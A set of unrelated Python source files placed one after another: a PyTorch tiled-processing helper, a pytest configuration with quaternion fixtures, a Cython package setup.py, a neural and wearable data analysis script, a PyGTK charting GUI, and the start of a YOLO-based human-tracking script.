Type of data in tensor `data` is expected to be float-point one (either float or double)
Args:
data (torch.Tensor): Input data to be processed by `func`.
func (Callable): Function to be used on `data`
block_size (int): Size of chunks
overlap (int): Tells how much chunks should overlap
intermediate_as_double (bool): Use `double` for intermidiate representation, improves accuracy
Returns:
torch.Tensor or list[torch.Tensor]: Result of the function `func` applied to input `data`
Example:
::
def f(x):
assert x.shape[2] <= 64
assert x.shape[3] <= 64
return x * x + x * x
x = torch.ones(3, 3, 512, 512, dtype=torch.float32)
r = dlutils.block_process_2d(x, f, block_size=32, overlap=8)
"""
if not 0.0 != len(data.shape):
raise ValueError("Invalid dimensionality of input data: {}".format(data.shape))
if 0 > overlap:
raise ValueError("Invalid value for overlap: {}".format(overlap))
width = data.shape[-1]
height = data.shape[-2]
blocks = []
for i in range((width + block_size - overlap - 1) // (block_size - overlap)):
offset_x = i * (block_size - overlap)
offset_x = min(offset_x + block_size, width) - block_size
w = min(offset_x + block_size, width) - offset_x
for j in range((height + block_size - overlap - 1) // (block_size - overlap)):
offset_y = j * (block_size - overlap)
offset_y = min(offset_y + block_size, height) - block_size
h = min(offset_y + block_size, height) - offset_y
blocks.append((offset_x, offset_y, w, h))
results = []
for offset_x, offset_y, w, h in blocks:
res = func(data[:, :, offset_y:offset_y + h, offset_x:offset_x + w])
if isinstance(res, list):
if not all(isinstance(x, torch.Tensor) for x in res):
raise ValueError("Function must returs either torch.Tensor, either list of torch.Tensor. But got list of {}".format([type(x) for x in res]))
elif isinstance(res, torch.Tensor):
pass
else:
raise ValueError("Function must return either torch.Tensor, either list of torch.Tensor. But got list of {}".format(type(res)))
results.append(res)
output = []
returns_value = False
if all(isinstance(x, list) for x in results):
pass
elif all(isinstance(x, torch.Tensor) for x in results):
_results = [[x] for x in results]
results = _results
returns_value =True
else:
raise ValueError("Function must return either torch.Tensor, either list of torch.Tensor.")
for tensor in results[0]:
output.append(torch.zeros(*tensor.shape[:2], height, width, dtype=torch.double if intermediate_as_double else tensor.dtype))
counts = torch.zeros(1, 1, height, width, dtype=torch.double)
weight_mask = torch.ones(1, 1, block_size, block_size, dtype=torch.double)
for i in range(overlap):
weight_mask[:, :, :, i] *= ((i + 1) / overlap)
weight_mask[:, :, :, -i] *= ((i + 1) / overlap)
for i in range(overlap):
weight_mask[:, :, i, :] *= ((i + 1) / overlap)
weight_mask[:, :, -i, :] *= ((i + 1) / overlap)
for block, res in zip(blocks, results):
offset_x, offset_y, w, h = block
counts[:, :, offset_y:offset_y + h, offset_x:offset_x + w] += weight_mask
for o, r in zip(output, res):
o[:, :, offset_y:offset_y + h, offset_x:offset_x + w] += r * weight_mask
if intermediate_as_double:
_output = []
for o, i in zip(output, results[0]):
o /= counts
_output.append(o.type(i.dtype))
output = _output
del _output
else:
for o in output:
o /= counts
if returns_value:
return output[0]
return output
if __name__ == '__main__':
def f(x):
assert x.shape[2] <= 64
assert x.shape[3] <= 64
return x * x + x * x
def f2(x):
assert x.shape[2] <= 64
assert x.shape[3] <= 64
return [x * 3, x * x + x * x]
x = torch.ones(3, 3, 512, 512, dtype=torch.float32)
r = block_process_2d(x, f, block_size=32, overlap=8)
print(r)
x = torch.ones(3, 3, 512, 512, dtype=torch.float32)
r = block_process_2d(x, f2, block_size=32, overlap=8)
print(r)
x = torch.randn(3, 3, 512, 512, dtype=torch.float32)
r = block_process_2d(x, f, block_size=32, overlap=8, intermediate_as_double=True)
assert torch.all(torch.abs(r - (x * x + x * x)) < 1e-18)
x = torch.randn(3, 3, 512, 512, dtype=torch.float32)
r = block_process_2d(x, f, block_size=32, overlap=8, intermediate_as_double=False)
assert torch.all(torch.abs(r - (x * x + x * x)) < 1e-5)
|
<gh_stars>10-100
# Copyright (c) 2021, <NAME>
# See LICENSE file for details: <https://github.com/moble/spherical/blob/master/LICENSE>
import os
import pytest
import numpy as np
import quaternionic
ell_max_default = 36
try:
import spinsfast
requires_spinsfast = lambda f: f
except:
requires_spinsfast = pytest.mark.skip(reason="spinsfast is missing")
try:
import scipy
requires_scipy = lambda f: f
except:
requires_scipy = pytest.mark.skip(reason="scipy is missing")
try:
import sympy
requires_sympy = lambda f: f
except:
requires_sympy = pytest.mark.skip(reason="sympy is missing")
def pytest_addoption(parser):
parser.addoption("--ell_max", action="store", type=int, default=ell_max_default,
help="Maximum ell value to test")
parser.addoption("--ell_max_slow", action="store", type=int, default=ell_max_default // 2,
help="Maximum ell value to test with slow tests")
parser.addoption("--run_slow_tests", action="store_true", default=False,
help="Run all tests, including slow ones")
def pytest_configure(config):
config.addinivalue_line("markers", "slow: marks tests as slow")
def pytest_collection_modifyitems(config, items):
if config.getoption("--run_slow_tests"):
return
skip_slow = pytest.mark.skip(reason="need --run_slow_tests option to run")
for item in items:
if "slow" in item.keywords:
item.add_marker(skip_slow)
def pytest_runtest_setup(item):
if 'slow' in item.keywords and not item.config.getoption("--run_slow_tests"):
pytest.skip("Need `--run_slow_tests` command-line argument to run")
@pytest.fixture
def ell_max(request):
return request.config.getoption("--ell_max")
@pytest.fixture
def ell_max_slow(request):
return request.config.getoption("--ell_max_slow")
@pytest.fixture
def special_angles():
return np.arange(-1 * np.pi, 1 * np.pi + 0.1, np.pi / 4.)
@pytest.fixture
def on_windows():
from sys import platform
return 'win' in platform.lower() and not 'darwin' in platform.lower()
@pytest.fixture
def eps():
return np.finfo(float).eps
def quaternion_sampler():
Qs_array = quaternionic.array([
[np.nan, 0., 0., 0.],
[np.inf, 0., 0., 0.],
[-np.inf, 0., 0., 0.],
[0., 0., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.],
[1.1, 2.2, 3.3, 4.4],
[-1.1, -2.2, -3.3, -4.4],
[1.1, -2.2, -3.3, -4.4],
[
0.18257418583505537115232326093360,
0.36514837167011074230464652186720,
0.54772255750516611345696978280080,
0.73029674334022148460929304373440
],
[1.7959088706354, 0.515190292664085, 0.772785438996128, 1.03038058532817],
[2.81211398529184, -0.392521193481878, -0.588781790222817, -0.785042386963756],
])
names = type("QNames", (object,), dict())()
names.q_nan1 = 0
names.q_inf1 = 1
names.q_minf1 = 2
names.q_0 = 3
names.q_1 = 4
names.x = 5
names.y = 6
names.z = 7
names.Q = 8
names.Qneg = 9
names.Qbar = 10
names.Qnormalized = 11
names.Qlog = 12
names.Qexp = 13
return Qs_array, names
@pytest.fixture
def Qs():
return quaternion_sampler()[0]
@pytest.fixture
def Q_names():
return quaternion_sampler()[1]
@pytest.fixture
def Q_conditions():
Qs_array, names = quaternion_sampler()
conditions = type("QConditions", (object,), dict())()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
conditions.zero = np.arange(len(Qs_array))[Qs_array == Qs_array[names.q_0]]
conditions.nonzero = np.arange(len(Qs_array))[np.nonzero(Qs_array)]
conditions.nan = np.arange(len(Qs_array))[np.isnan(Qs_array)]
conditions.nonnan = np.arange(len(Qs_array))[~np.isnan(Qs_array)]
conditions.nonnannonzero = np.arange(len(Qs_array))[~np.isnan(Qs_array) & (Qs_array != Qs_array[names.q_0])]
conditions.inf = np.arange(len(Qs_array))[np.isinf(Qs_array)]
conditions.noninf = np.arange(len(Qs_array))[~np.isinf(Qs_array)]
conditions.noninfnonzero = np.arange(len(Qs_array))[~np.isinf(Qs_array) & (Qs_array != Qs_array[names.q_0])]
conditions.finite = np.arange(len(Qs_array))[np.isfinite(Qs_array)]
conditions.nonfinite = np.arange(len(Qs_array))[~np.isfinite(Qs_array)]
conditions.finitenonzero = np.arange(len(Qs_array))[np.isfinite(Qs_array) & (Qs_array != Qs_array[names.q_0])]
return conditions
@pytest.fixture
def Rs():
np.random.seed(1842)
ones = [0, -1., 1.]
rs = [[w, x, y, z] for w in ones for x in ones for y in ones for z in ones][1:]
rs = rs + [r for r in [quaternionic.array(np.random.uniform(-1, 1, size=4)) for _ in range(20)]]
return quaternionic.array(rs).normalized
|
<filename>setup.py
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import contextlib
from setuptools import Extension, setup
from distutils.command.build_ext import build_ext
from distutils.sysconfig import get_python_inc
from distutils import ccompiler, msvccompiler
from Cython.Build import cythonize
PACKAGES = ["preshed", "preshed.tests"]
MOD_NAMES = ["preshed.maps", "preshed.counter", "preshed.bloom"]
# By subclassing build_extensions we have the actual compiler that will be used which is really known only after finalize_options
# http://stackoverflow.com/questions/724664/python-distutils-how-to-get-a-compiler-that-is-going-to-be-used
compile_options = {
"msvc": ["/Ox", "/EHsc"],
"other": ["-O3", "-Wno-strict-prototypes", "-Wno-unused-function"],
}
link_options = {"msvc": [], "other": []}
class build_ext_options:
def build_options(self):
for e in self.extensions:
e.extra_compile_args = compile_options.get(
self.compiler.compiler_type, compile_options["other"]
)
for e in self.extensions:
e.extra_link_args = link_options.get(
self.compiler.compiler_type, link_options["other"]
)
class build_ext_subclass(build_ext, build_ext_options):
def build_extensions(self):
build_ext_options.build_options(self)
build_ext.build_extensions(self)
def clean(path):
for name in MOD_NAMES:
name = name.replace(".", "/")
for ext in [".so", ".html", ".cpp", ".c"]:
file_path = os.path.join(path, name + ext)
if os.path.exists(file_path):
os.unlink(file_path)
@contextlib.contextmanager
def chdir(new_dir):
old_dir = os.getcwd()
try:
os.chdir(new_dir)
sys.path.insert(0, new_dir)
yield
finally:
del sys.path[0]
os.chdir(old_dir)
def setup_package():
root = os.path.abspath(os.path.dirname(__file__))
if len(sys.argv) > 1 and sys.argv[1] == "clean":
return clean(root)
with chdir(root):
with open(os.path.join(root, "preshed", "about.py")) as f:
about = {}
exec(f.read(), about)
with open(os.path.join(root, "README.md")) as f:
readme = f.read()
include_dirs = [get_python_inc(plat_specific=True)]
if (
ccompiler.new_compiler().compiler_type == "msvc"
and msvccompiler.get_build_version() == 9
):
include_dirs.append(os.path.join(root, "include", "msvc9"))
ext_modules = []
for mod_name in MOD_NAMES:
mod_path = mod_name.replace(".", "/") + ".pyx"
ext_modules.append(
Extension(
mod_name, [mod_path], language="c++", include_dirs=include_dirs
)
)
setup(
name="preshed",
zip_safe=False,
packages=PACKAGES,
package_data={"": ["*.pyx", "*.pxd"]},
description=about["__summary__"],
long_description=readme,
long_description_content_type="text/markdown",
author=about["__author__"],
author_email=about["__email__"],
version=about["__version__"],
url=about["__uri__"],
license=about["__license__"],
ext_modules=cythonize(ext_modules, language_level=2),
setup_requires=["cython>=0.28", "cymem>=2.0.2,<2.1.0", "murmurhash>=0.28.0,<1.1.0"],
install_requires=["cymem>=2.0.2,<2.1.0", "murmurhash>=0.28.0,<1.1.0"],
classifiers=[
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Cython",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Topic :: Scientific/Engineering",
],
cmdclass={"build_ext": build_ext_subclass},
)
if __name__ == "__main__":
setup_package()
|
<reponame>molaruna/rcs_wearable_analysis
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This function synchronizes and processes all data from the local directory
it is run. This data can include files from the Summit RC+S system, Apple watches,
PKG watches, and patient reports.
All data must be CSV formatted and include a 'timestamp' column header
python3 sync_data.py <feature_key> <target_key>
python3 sync_data.py 'spectra' 'DK'
@author: mariaolaru
"""
import sync_funcs as sync
def main(data_dir, feature_key):
#Assumes 250Hz sr
#Processes all data in the current directory
#feature_key = int(sys.argv[1])
#target_key = float(sys.argv[2])
#For debugging
#TODO: should include option for which types of files to analyze
#feature_key = 'fooof_peak_rm'
#feature_key = 'spectra'
target_list = ['pkg_dk', 'apple_dk', 'pkg_bk', 'pkg_tremor', 'apple_tremor']
#data_dir = os.getcwd()
#For debugging
# feature_key = 'spectra'
# data_dir = '/Users/mariaolaru/Documents/temp/rcs_wearable_analysis/data/RCS14L/RCS14L_m2'
# data_dir = '/Users/mariaolaru/Documents/temp/rcs_wearable_analysis/data/RCS12R/RCS12R_mp'
#data_dir = '/Users/mariaolaru/Documents/temp/rcs_wearable_analysis/data/RCS12L/RCS12L_ma'
sync.preproc_files(data_dir)
df_times = sync.get_meta_data(data_dir, feature_key) #should fix to calculat 2min scores as well
targets = sync.get_psd_overlaps(df_times, target_list)
#targets = ['apple_dk', 'apple_tremor']
#Check to ensure data is still feeding in properly
df = sync.merge_dfs(data_dir, feature_key, targets)
#for i in range(df.shape[0]):
# plt.plot(df.iloc[i, 126:126+125], color= 'b', alpha = 0.01)
#for i in range(df.shape[0]):
# plt.plot(da.sel(time_interval = 'min1', contact = '+2-0')[i, :], color = 'b', alpha = 0.01)
da = sync.reshape_data(df, feature_key, targets)
#da.sel(time_interval = 'min1', contact = '+2-0').values.shape
#867, 131
#Plot spectral data
da_psd = sync.reshape_data(df, feature_key, targets, psd_only = True)
sync.plot_spectra(da_psd, 'psd', 'overlaid', data_dir, feature_key)
#Plot spectral data summary stats
da_psd_stats = sync.compute_spectra_stats(df, feature_key)
sync.plot_spectra(da_psd_stats, 'psd', 'ci', data_dir, feature_key)
#Normalize all data
df_norm = sync.scale_data(df, 'minmax')
da_norm = sync.reshape_data(df_norm, feature_key, targets)
#Plot top PCs for each frequency
da_psd_norm = sync.reshape_data(df_norm, feature_key, targets, psd_only = True)
[da_pcaf, df_pcaf_ratios] = sync.compute_pca(da_psd_norm, 5, 'frequency')
sync.plot_spectra(da_pcaf, 'pca', 'frequency', data_dir, 'feature_key')
#Get top PCs for each timestamp
df_norm_psd = sync.get_psd(df_norm, 'min1_spectra')[0]
[da_pcaf_t, df_pcaf_ratios_t] = sync.compute_pca(df_norm_psd, 20, 'time')
#Plot Pearson's r of spectral features with wearable targets
da_pearsonr = sync.compute_correlations(df_norm, feature_key, target_list)
sync.plot_spectra(da_pearsonr, 'corr', 'r_pval', data_dir, feature_key)
sync.plot_spectra(da_pearsonr, 'corr', 'r', data_dir, feature_key)
#TODO create heatmap output for each correlation plot
#TODO Should also run the correlation with coherence, not just power scores
#Get highest r-val with a significant pvalue for sub-cort & cort channels
da_top_sigcorrs = sync.get_top_sigcorrs(da_pearsonr, abs_val = True)
df_top_ch = sync.get_top_channels(da_top_sigcorrs)
#TODO should save out these tables
dfl_top_ts = sync.get_top_timeseries(da_norm, da_top_sigcorrs, df_top_ch)
sync.plot_timeseries(dfl_top_ts, data_dir, feature_key, 'datetime')
sync.plot_timeseries(dfl_top_ts, data_dir, feature_key, 'samples')
#compute cross-correlation
dfl_top_cc = sync.compute_top_ccfs(dfl_top_ts)
sync.plot_crf(dfl_top_cc, feature_key, data_dir)
#time-domain PCs
[df_pcat, df_pcat_ratios] = sync.compute_pca(df_norm_psd.iloc[:, 0:252], 20, 'time') #only min1 spectra data
#run linear regressions
[df_lr_preds, df_lr_metrics] = sync.run_lr_model(df_pcat.T, df_norm.loc[:, targets], 'top 20 PCs')
[df_lr_preds2, df_lr_metrics2] = sync.run_lr_model(df_norm_psd.iloc[:, 0:252], df_norm.loc[:, targets], '504 freq features')
#run blstm
#sync.run_blstm(df_norm_psd.iloc[:, 0:252], df_norm.loc[:, 'apple_tremor'].to_numpy(), 'apple_tremor')
#Then, run the blstm, and show learning curve
#Lastly, should plot comparison with predicted values of linear regression and BLSTM
|
# Copyright(c) 2007-2009 by <NAME> <<EMAIL>>
#
# This file is part of Chavier.
#
# Chavier is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Chavier is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Chavier. If not, see <http://www.gnu.org/licenses/>.
import pygtk
pygtk.require('2.0')
import gtk
from chavier.dialogs import (
TextInputDialog, PointDialog, OptionDialog, RandomGeneratorDialog,
AboutDialog, warning,
)
class GUI(object):
def __init__(self, app):
self.app = app
self.chart = None
self.surface = None
self.main_window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.main_window.connect('delete_event', self.delete_event)
self.main_window.connect('destroy', self.destroy)
self.main_window.set_default_size(640, 480)
self.main_window.set_title(u'Chavier')
vbox = gtk.VBox()
self.main_window.add(vbox)
vbox.show()
menubar, toolbar = self._create_ui_manager()
vbox.pack_start(menubar, False, False)
menubar.show()
vbox.pack_start(toolbar, False, False)
toolbar.show()
hpaned = gtk.HPaned()
vbox.pack_start(hpaned, True, True)
hpaned.show()
vpaned = gtk.VPaned()
hpaned.add1(vpaned)
vpaned.show()
block1 = self._create_sidebar_block(u'Data sets',
self._datasets_notebook_creator)
self._create_dataset("Dataset 1")
block1.set_size_request(-1, 200)
vpaned.add1(block1)
block1.show()
block2 = self._create_sidebar_block(u'Options',
self._options_treeview_creator)
vpaned.add2(block2)
block2.show()
self.drawing_area = gtk.DrawingArea()
self.drawing_area.connect('expose_event',
self.drawing_area_expose_event)
self.drawing_area.connect('size_allocate',
self.drawing_area_size_allocate_event)
hpaned.add2(self.drawing_area)
self.drawing_area.show()
self.main_window.show()
def _create_ui_manager(self):
self.uimanager = gtk.UIManager()
accel_group = self.uimanager.get_accel_group()
self.main_window.add_accel_group(accel_group)
action_group = gtk.ActionGroup('default')
action_group.add_actions([
('file', None, '_File', None, 'File', None),
('quit', gtk.STOCK_QUIT, None, None, 'Quit the program',
self.quit),
('edit', None, '_Edit', None, 'Edit', None),
('add_dataset', gtk.STOCK_ADD, '_Add dataset',
'<ctrl><alt>plus', 'Add another dataset', self.add_dataset),
('remove_dataset', gtk.STOCK_REMOVE, '_Remove dataset',
'<ctrl><alt>minus', 'Remove the current dataset',
self.remove_dataset),
('edit_dataset', gtk.STOCK_EDIT, '_Edit dataset name',
'<ctrl><alt>e', 'Edit the name of the current dataset',
self.edit_dataset),
('add_point', gtk.STOCK_ADD, 'Add _point', '<ctrl>plus',
'Add another point to the current dataset', self.add_point),
('remove_point', gtk.STOCK_REMOVE, 'Remove p_oint',
'<ctrl>minus',
'Remove the current point of the current dataset',
self.remove_point),
('edit_point', gtk.STOCK_EDIT, 'Edit po_int', '<ctrl>e',
'Edit the current point of the current dataset',
self.edit_point),
('edit_option', gtk.STOCK_EDIT, 'Edit op_tion', None,
'Edit the current option',
self.edit_option),
('view', None, '_View', None, 'View', None),
('refresh', gtk.STOCK_REFRESH, None, '<ctrl>r',
'Update the chart', self.refresh),
('tools', None, '_Tools', None, 'Tools', None),
('random-points', gtk.STOCK_EXECUTE, '_Generate random points',
'<ctrl>g', 'Generate random points',
self.generate_random_points),
('dump-chart-state', gtk.STOCK_CONVERT, '_Dump chart state',
'<ctrl>d', 'Dump internal chart variables',
self.dump_chart_state),
('help', None, '_Help', None, 'Help', None),
('about', gtk.STOCK_ABOUT, None, None, 'About this program',
self.about),
])
action_group.add_radio_actions([
('verticalbar', None, '_Vertical bars', None,
'Use vertical bars chart', self.app.VERTICAL_BAR_TYPE),
('horizontalbar', None, '_Horizontal bars', None,
'Use horizontal bars chart', self.app.HORIZONTAL_BAR_TYPE),
('line', None, '_Line', None,
'Use lines chart', self.app.LINE_TYPE),
('pie', None, '_Pie', None,
'Use pie chart', self.app.PIE_TYPE),
('scatter', None, '_Scatter', None,
'Use scatter chart', self.app.SCATTER_TYPE),
('stackedverticalbar', None, '_Stacked Vertical bars', None,
'Use stacked vertical bars chart',
self.app.STACKED_VERTICAL_BAR_TYPE),
('stackedhorizontalbar', None, '_Stacked Horizontal bars', None,
'Use stacked horizontal bars chart',
self.app.STACKED_HORIZONTAL_BAR_TYPE),
], self.app.VERTICAL_BAR_TYPE, self.on_chart_type_change)
self.uimanager.insert_action_group(action_group, -1)
ui = """<ui>
<menubar name="MenuBar">
<menu action="file">
<menuitem action="quit"/>
</menu>
<menu action="edit">
<menuitem action="add_dataset"/>
<menuitem action="remove_dataset"/>
<menuitem action="edit_dataset"/>
<separator />
<menuitem action="add_point"/>
<menuitem action="remove_point"/>
<menuitem action="edit_point"/>
<separator />
<menuitem action="edit_option"/>
</menu>
<menu action="view">
<menuitem action="refresh"/>
<separator />
<menuitem action="verticalbar"/>
<menuitem action="horizontalbar"/>
<menuitem action="stackedverticalbar"/>
<menuitem action="stackedhorizontalbar"/>
<menuitem action="line"/>
<menuitem action="pie"/>
<menuitem action="scatter"/>
</menu>
<menu action="tools">
<menuitem action="random-points"/>
<menuitem action="dump-chart-state"/>
</menu>
<menu action="help">
<menuitem action="about"/>
</menu>
</menubar>
<toolbar name="ToolBar">
<toolitem action="quit"/>
<separator />
<toolitem action="add_dataset"/>
<toolitem action="remove_dataset"/>
<separator />
<toolitem action="add_point"/>
<toolitem action="remove_point"/>
<separator />
<toolitem action="refresh"/>
</toolbar>
</ui>
"""
self.uimanager.add_ui_from_string(ui)
self.uimanager.ensure_update()
menubar = self.uimanager.get_widget('/MenuBar')
toolbar = self.uimanager.get_widget('/ToolBar')
return menubar, toolbar
def _create_sidebar_block(self, title, child_widget_creator):
box = gtk.VBox(spacing=6)
box.set_border_width(6)
label = gtk.Label()
label.set_markup(u'<span size="large" weight="bold">%s</span>' % title)
label.set_alignment(0.0, 0.5)
box.pack_start(label, False, False)
label.show()
child_widget = child_widget_creator()
box.pack_start(child_widget, True, True)
child_widget.show()
return box
def _datasets_notebook_creator(self):
self.datasets_notebook = gtk.Notebook()
self.datasets_notebook.set_scrollable(True)
return self.datasets_notebook
def _dataset_treeview_creator(self):
store = gtk.ListStore(float, float)
treeview = gtk.TreeView(store)
column1 = gtk.TreeViewColumn('x', gtk.CellRendererText(), text=0)
treeview.append_column(column1)
column2 = gtk.TreeViewColumn('y', gtk.CellRendererText(), text=1)
treeview.append_column(column2)
treeview.connect('row-activated', self.dataset_treeview_row_activated)
scrolled_window = gtk.ScrolledWindow()
scrolled_window.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)
scrolled_window.add(treeview)
treeview.show()
return scrolled_window
def _options_treeview_creator(self):
self.options_store = gtk.TreeStore(str, str, object)
options = self.app.get_default_options()
self._fill_options_store(options, None, self.app.OPTIONS_TYPES)
self.options_treeview = gtk.TreeView(self.options_store)
column1 = gtk.TreeViewColumn('Name', gtk.CellRendererText(), text=0)
self.options_treeview.append_column(column1)
column2 = gtk.TreeViewColumn('Value', gtk.CellRendererText(), text=1)
self.options_treeview.append_column(column2)
self.options_treeview.expand_all()
self.options_treeview.connect('row-activated',
self.options_treeview_row_activated)
scrolled_window = gtk.ScrolledWindow()
scrolled_window.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)
scrolled_window.add(self.options_treeview)
self.options_treeview.show()
return scrolled_window
def _fill_options_store(self, options, parent_node, types):
for name, value in options.items():
value_type = types[name]
if isinstance(value, dict):
current_parent = self.options_store.append(parent_node,
(name, None, None))
self._fill_options_store(value, current_parent, value_type)
else:
if value is not None:
value = str(value)
self.options_store.append(parent_node,
(name, value, value_type))
def _get_current_dataset_tab(self):
current_tab = self.datasets_notebook.get_current_page()
if current_tab != -1:
return self.datasets_notebook.get_nth_page(current_tab)
def _create_dataset(self, name):
scrolled_window = self._dataset_treeview_creator()
scrolled_window.show()
label = gtk.Label(name)
self.datasets_notebook.append_page(scrolled_window, label)
def _get_datasets(self):
datasets = []
n_pages = self.datasets_notebook.get_n_pages()
for i in range(n_pages):
tab = self.datasets_notebook.get_nth_page(i)
label = self.datasets_notebook.get_tab_label(tab)
name = label.get_label()
treeview = tab.get_children()[0]
model = treeview.get_model()
points = [(x, y) for x, y in model]
if len(points) > 0:
datasets.append((name, points))
return datasets
def _get_chart_type(self):
action_group = self.uimanager.get_action_groups()[0]
action = action_group.get_action('verticalbar')
return action.get_current_value()
def _get_options(self, iter):
options = {}
while iter is not None:
name, value, value_type = self.options_store.get(iter, 0, 1, 2)
if value_type is None:
child = self.options_store.iter_children(iter)
options[name] = self._get_options(child)
else:
if value is not None:
converter = str_converters[value_type]
value = converter(value)
options[name] = value
iter = self.options_store.iter_next(iter)
return options
def _edit_point_internal(self, model, iter):
x, y = model.get(iter, 0, 1)
dialog = PointDialog(self.main_window, x, y)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
x, y = dialog.get_point()
model.set(iter, 0, x, 1, y)
self.refresh()
dialog.destroy()
def _edit_option_internal(self, model, iter):
name, value, value_type = model.get(iter, 0, 1, 2)
parents = []
parent = model.iter_parent(iter)
while parent is not None:
parents.append(model.get_value(parent, 0))
parent = model.iter_parent(parent)
parents.reverse()
parents.append(name)
label = u'.'.join(parents)
dialog = OptionDialog(self.main_window, label, value, value_type)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
new_value = dialog.get_value()
if new_value == "":
new_value = None
model.set_value(iter, 1, new_value)
self.refresh()
dialog.destroy()
def delete_event(self, widget, event, data=None):
return False
def destroy(self, widget, data=None):
gtk.main_quit()
def drawing_area_expose_event(self, widget, event, data=None):
if self.chart is None:
return
cr = widget.window.cairo_create()
cr.rectangle(event.area.x, event.area.y,
event.area.width, event.area.height)
cr.clip()
cr.set_source_surface(self.chart.surface, 0, 0)
cr.paint()
def drawing_area_size_allocate_event(self, widget, event, data=None):
if self.chart is not None:
self.refresh()
def on_chart_type_change(self, action, current, data=None):
if self.chart is not None:
self.refresh()
def dataset_treeview_row_activated(self, treeview, path, view_column):
model = treeview.get_model()
iter = model.get_iter(path)
self._edit_point_internal(model, iter)
def options_treeview_row_activated(self, treeview, path, view_column):
model = treeview.get_model()
iter = model.get_iter(path)
self._edit_option_internal(model, iter)
def quit(self, action):
self.main_window.destroy()
def add_dataset(self, action):
n_pages = self.datasets_notebook.get_n_pages()
suggested_name = u'Dataset %d' % (n_pages + 1)
dialog = TextInputDialog(self.main_window, suggested_name)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
name = dialog.get_name()
self._create_dataset(name)
self.datasets_notebook.set_current_page(n_pages)
dialog.destroy()
def remove_dataset(self, action):
current_tab = self.datasets_notebook.get_current_page()
assert current_tab != -1
self.datasets_notebook.remove_page(current_tab)
def edit_dataset(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
label = self.datasets_notebook.get_tab_label(tab)
name = label.get_label()
dialog = TextInputDialog(self.main_window, name)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
name = dialog.get_name()
label.set_label(name)
dialog.destroy()
def add_point(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
model = treeview.get_model()
dialog = PointDialog(self.main_window, len(model) * 1.0, 0.0)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
x, y = dialog.get_point()
model.append((x, y))
self.refresh()
dialog.destroy()
def remove_point(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
selection = treeview.get_selection()
model, selected = selection.get_selected()
if selected is None:
warning(self.main_window, "You must select the point to remove")
return
model.remove(selected)
self.refresh()
def edit_point(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
selection = treeview.get_selection()
model, selected = selection.get_selected()
if selected is None:
warning(self.main_window, "You must select the point to edit")
return
self._edit_point_internal(model, selected)
def edit_option(self, action):
selection = self.options_treeview.get_selection()
model, selected = selection.get_selected()
if selected is None:
warning(self.main_window, "You must select the option to edit")
return
self._edit_option_internal(model, selected)
def refresh(self, action=None):
datasets = self._get_datasets()
if datasets:
root = self.options_store.get_iter_first()
options = self._get_options(root)
chart_type = self._get_chart_type()
alloc = self.drawing_area.get_allocation()
self.chart = self.app.get_chart(datasets, options, chart_type,
alloc.width, alloc.height)
self.drawing_area.queue_draw()
else:
self.chart = None
def generate_random_points(self, action=None):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
model = treeview.get_model()
dialog = RandomGeneratorDialog(self.main_window)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
points = dialog.generate_points()
for point in points:
model.append(point)
self.refresh()
dialog.destroy()
def dump_chart_state(self, action=None):
if self.chart is None:
return
alloc = self.drawing_area.get_allocation()
print 'CHART STATE'
print '-' * 70
print 'surface: %d x %d' % (alloc.width, alloc.height)
print 'area :', self.chart.area
print
print 'minxval:', self.chart.minxval
print 'maxxval:', self.chart.maxxval
print 'xrange :', self.chart.xrange
print
print 'minyval:', self.chart.minyval
print 'maxyval:', self.chart.maxyval
print 'yrange :', self.chart.yrange
def about(self, action=None):
dialog = AboutDialog(self.main_window)
dialog.run()
dialog.destroy()
def run(self):
gtk.main()
def str2bool(str):
if str.lower() == "true":
return True
else:
return False
str_converters = {
str: str,
int: int,
float: float,
unicode: unicode,
bool: str2bool,
}
|
import multiprocessing as mp
import os
from threading import Thread
from human_tracker import camera_capture
from database import ImageDB
from absl import app, flags, logging
from absl.flags import FLAGS
import numpy as np
import pandas as pd
import signal, sys
import datetime as dt
import shutil
import time
flags.DEFINE_string('framework', 'tf', '(tf, tflite, trt)')
flags.DEFINE_string('weights', './checkpoints/yolov4-416',
'path to weights file')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_boolean('tiny', False, 'yolo or yolo-tiny')
flags.DEFINE_string('model', 'yolov4', 'yolov3 or yolov4')
flags.DEFINE_string('video', './data/video/', 'path to input video or set to 0 for webcam')
flags.DEFINE_string('rtsp_path', 'data/rtsp/rtsp_cam.xlsx', 'default rtsp camera path')
flags.DEFINE_string('reid_db_path', "../reid/archive", 'default reid database path, where all of the samples from cam are saved into the db with timestamp')
